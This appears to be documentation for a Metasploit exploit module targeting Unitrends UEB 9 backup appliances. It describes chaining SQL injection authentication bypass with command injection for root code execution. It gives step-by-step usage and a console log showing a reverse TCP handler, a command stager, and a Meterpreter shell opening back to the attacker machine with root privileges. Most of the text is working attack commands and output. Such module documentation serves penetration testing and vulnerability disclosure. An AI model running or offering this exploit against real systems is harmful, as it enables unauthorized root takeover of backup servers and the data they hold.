## Vulnerable Application

  Unitrends UEB 9 http api/storage remote root

  This exploit leverages a sqli vulnerability for authentication bypass,
  together with command injection for subsequent root RCE.

## Verification Steps

  1. ```use exploit/linux/http/ueb9_api_storage ```
  2. ```set lhost [IP]```
  3. ```set rhost [IP]```
  4. ```exploit```
  5. A meterpreter session should have been opened successfully

## Scenarios

### UEB 9.1 on CentOS 6.5

```
msf > use exploit/linux/http/ueb9_api_storage
msf exploit(ueb9_api_storage) > set rhost 10.0.0.230
rhost => 10.0.0.230
msf exploit(ueb9_api_storage) > set lhost 10.0.0.141
lhost => 10.0.0.141
msf exploit(ueb9_api_storage) > exploit

[*] Started reverse TCP handler on 10.0.0.141:4444
[*] 10.0.0.230:443 - pwn'ng ueb 9....
[*] Command Stager progress -  19.83% done (164/827 bytes)
[*] Command Stager progress -  39.30% done (325/827 bytes)
[*] Command Stager progress -  57.44% done (475/827 bytes)
[*] Command Stager progress -  75.45% done (624/827 bytes)
[*] Command Stager progress -  93.35% done (772/827 bytes)
[*] Command Stager progress - 110.88% done (917/827 bytes)
[*] Sending stage (826872 bytes) to 10.0.0.230
[*] Command Stager progress - 126.72% done (1048/827 bytes)
[*] Meterpreter session 1 opened (10.0.0.141:4444 -> 10.0.0.230:33674) at 2017-10-06 11:07:47 -0400

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
```